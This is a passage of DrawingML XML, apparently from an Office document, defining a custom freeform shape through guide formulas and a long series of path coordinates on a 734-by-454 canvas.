                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 45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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
